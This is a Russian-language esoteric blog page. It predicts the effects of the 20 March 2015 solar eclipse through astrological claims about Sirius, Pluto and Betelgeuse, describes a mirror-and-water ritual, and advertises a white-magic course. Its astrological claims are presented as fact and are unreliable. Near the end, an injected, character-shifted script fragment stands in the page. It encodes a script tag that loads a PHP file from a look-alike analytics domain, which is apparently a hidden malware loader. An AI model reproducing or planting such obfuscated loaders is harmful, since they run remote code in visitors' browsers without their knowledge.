20 03 2015 ЗАТМЕНИЕ СОЛНЦА 20 03 2015 ЗАТМЕНИЕ СОЛНЦА (1)
​СОЛНЕЧНОЕ ЗАТМЕНИЕ 20 МАРТА 2015 ГОДА.
Солнечное затмение 20 марта 2015 года обещает быть судьбоносным.
Пояснения.
1. Солнце является источником силы космического огня, Ян. Луна - Инь. Во время затмения потоки лунной и солнечной энергии как бы на время прерываются, а после окончания затмения возобновляются. Это похоже на то, как реку перегораживают плотиной, а потом запруду снимают. Солнечный и Лунный свет являются как бы проектором, который запускает на реализацию мыслеформы и программы из энерго-информационногополя Вселенной. Поэтому во время затмения есть возможность перепрограммировать реализацию мыслеформ (этот процесс подобен тому, как в выключенном проекторе меняют диапозитив). Но и наша Вселенная в это время также меняет программу своего воздействия на Землю.
2. Процессы во время затмения будет задавать Сириус. Сириус - Звезда Пророков. Сириус - это и есть та Рождественская Звезда, что привела волхвов к младенцу, а еще ранее мудрецов к месту рождения Кришны, и она же озарила место рождения Зороастра - да и многих других Великих Учителей. Сириус наполнит своей энергией всё пространство, чем запустит программы созидания во всем мире. Тем более, что узел Фортуна или Колесо Судьбы, находится в орбисе Сириуса.
3. Оппозиция Сириуса и Колеса Судьбы к Плутону создает возможность пробуждения огромных скрытых сил в глубинах Земли (проявление сил Плутона в прошлом веке - открытие урановых руд и ядерная энергетика). Задает процесс открытия и освоения человечеством более глобальных энергий. Также разбудит внутреннюю силу в каждом из нас.
3. Квадратура Плутон - Уран задолго до затмения, еще при своем формировании, задавала хаотические процессы на Земле. После затмения сформированный аспект начнёт продуцировать порядок из хаоса. Это обозначает возможность остановки многих конфликтов в мире. Квадратура Нептун - Уран также способствует выделению дополнительных энергий - как теллурических, так и космических, которые будут друг друга усиливать.
4. Квадратуры Бетельгейзе (альфа Ориона - эта звезда одна из самых мощнейших в нашей Галактике, её светимость превышает светимость Солнца в 105 тысяч раз, а размер в 950 раз) с Солнцем и Луной вызовут мощнейший энергетический всплеск в сознании людей, что должно привести к изменению установок в массовом сознании и быстрому отказу от стереотипов прошлых эпох. Затмение также запустит на быструю реализацию накопленные кармические узлы..
5. Обряд на затмение стандартный: два стакана с водой и круглое зеркало (отражающей стороной вверх). Пик Затмения в 11-37. За 19 минут до затмения стираем весь негатив (болезни, неудачи, препятствия - растворяем в пространстве,подобно тому, как сахар растворяется в чашке с чаем. Потом 19 минут создаем позитивные мыслеформы. Затем выпиваем стакан слева от себя, затем справа. До и после ритуала также рекомендуется омовение.
И мы Вас приглашаем на наши занятия "Ведическая Магия 1 и 2 Круга" 21 и 22 марта, они будут уникальны - структура практик и ритуалов учтёт Силы, пробужденные затмением и направит их в благоприятное русло.

Школа духовного развития “Мистическая Гирлянда” приглашает вас пройти курс по белой магии "Курс Ведической Белой Магии 1-го и 2-го круга."

  • На этих курсах Вы окунетесь в мир тайного знания, историю и традиции древних культов и религий.
  • Познаете глубины себя и собственные возможности в области магии и сопредельных областей тайнознания.
  • Научитесь определять  и защищаться от различных способов воздействия на себя или близких Вам людей.
  • Научитесь устанавливать симпатические связи с объектами и субъектами Вашей жизни.
  • Сделаете огромный шаг вперед к разрешению своих кармических и бытовых задач.

Курс читает: белый маг Украины, доктор тайнознания (звание присвоено Киевским институтом нетрадиционной медицины в 1992 году), автор книг “Белая Магия”, “Загадки Белой Магии”, “Корабли-призраки”, “Мистический фольклор”, “Громы темного берега”, “Радуга белой магии”, „Юра – Колдун или Ямараджа”, „Книга Тени или Настоящая Черная Книга”, „Некромантика и Некромагия” и других – всего 32 издания, консультант и учасник научно-популярных фильмов “Войны белой и черной магии” (режиссер В.П.Олендр, “Киевнаучфильм”, 1991, фильм отмечен на Каннском Кинофестивале 1994г.), “Тайнознание и политика”(режиссер А.В.Иванов, Свердловская киностудия, 1991 ),“Кто Вы, Арилин?”(режиссер А.Вилькенс, “Мосфильм”, 1992), „Проклятие Ведьм” („ИНТЕР”, 2007)  - РАОКРИОМ (Мехеда Игорь Владимирович).

Всем выпускникам школы по окончанию курса выдается свидетельство о прохождении "Курса Ведической Белой Магии 1-го и 2-го круга."

Подробная программа курса размещена на странице: http://garland.org.ua/kursy-magii
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>